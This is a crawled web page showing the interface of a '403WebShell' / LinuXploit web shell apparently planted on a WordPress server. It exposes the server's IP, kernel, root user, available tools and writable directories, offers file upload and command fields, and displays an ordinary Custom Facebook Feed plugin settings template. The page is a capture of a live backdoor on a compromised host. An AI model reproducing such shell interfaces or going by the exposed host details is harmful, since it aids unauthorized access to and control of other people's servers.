WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.212
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/tribe_david/wp-content/plugins/custom-facebook-feed/admin/views/settings/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/tribe_david/wp-content/plugins/custom-facebook-feed/admin/views/settings/content.php
<?php if (! defined('ABSPATH')) {
	exit;
} // Exit if accessed directly ?>
<div class="cff-fb-full-wrapper cff-fb-fs">
	<?php

		/**
		 * CFF Admin Notices
		 *
		 * @since 4.0
		 */

		do_action('cff_admin_notices');
	?>
	<div class="section-header">
		<h1>{{genericText.settings}}</h1>
	</div>

	<div class="sb-tabs-container" id="sb-tabs-container">
		<form action="">
			<div class="sb-tabs">
				<div class="left-buttons">
					<tab v-bind:section="section" v-bind:index="index" v-for="(section, index) in sections" v-bind:class="{ active : section === currentTab }" v-bind:data-index="index+1" key="index"></tab>
				</div>
				<div class="right-buttons">
					<button class="cff-btn sb-btn-orange" @click.prevent="saveSettings" :disabled="btnStatus !== null">
						<span v-html="saveChangesIcon()"></span>
						{{genericText.saveSettings}}
					</button>
				</div>
				<span class="tab-indicator" v-bind:style="getStyle"></span>
			</div>
			<transition :name="chooseDirection">
				<div class="sb-tab-content" v-bind:is="selected" :class="'cff-license-' + licenseType">
					<?php
						CustomFacebookFeed\CFF_View::render('settings.tab.general');
						CustomFacebookFeed\CFF_View::render('settings.tab.feeds');
						CustomFacebookFeed\CFF_View::render('settings.tab.translation');
						CustomFacebookFeed\CFF_View::render('settings.tab.advanced');
					?>
				</div>
			</transition>
			<div class="cff-save-button">
				<button class="cff-btn sb-btn-orange" @click.prevent="saveSettings" :disabled="btnStatus !== null">
					<span v-html="saveChangesIcon()"></span>
					{{genericText.saveSettings}}
				</button>
			</div>

			<div v-if="licenseType == 'free'" class="cff-settings-cta">
				<?php
					CustomFacebookFeed\CFF_View::render('sections.settings_footer_cta');
				?>
			</div>
		</form>
		<?php include_once CFF_PLUGIN_DIR . 'admin/views/sections/footer_socials.php'; ?>
	</div>
</div>
<?php
	include_once CFF_BUILDER_DIR . 'templates/sections/popup/add-source-popup.php';
	include_once CFF_BUILDER_DIR . 'templates/sections/popup/confirm-dialog-popup.php';
	include_once CFF_BUILDER_DIR . 'templates/sections/popup/source-instances.php';
?>
<div class="sb-notification-ctn" :data-active="notificationElement.shown" :data-type="notificationElement.type">
	<div class="sb-notification-icon" v-html="svgIcons[notificationElement.type+'Notification']"></div>
	<span class="sb-notification-text" v-html="notificationElement.text"></span>
</div>

<sb-add-source-component
:sources-list="sourcesList"
:select-source-screen="selectSourceScreen"
:views-active="viewsActive"
:generic-text="genericText"
:selected-feed="selectedFeed"
:svg-icons="svgIcons"
:links="links"
ref="addSourceRef"
>
</sb-add-source-component>

<sb-confirm-dialog-component
:dialog-box.sync="dialogBox"
:source-to-delete="sourceToDelete"
:svg-icons="svgIcons"
:parent-type="'settings'"
:generic-text="genericText"
></sb-confirm-dialog-component>

Youez - 2016 - github.com/yon3zu
LinuXploit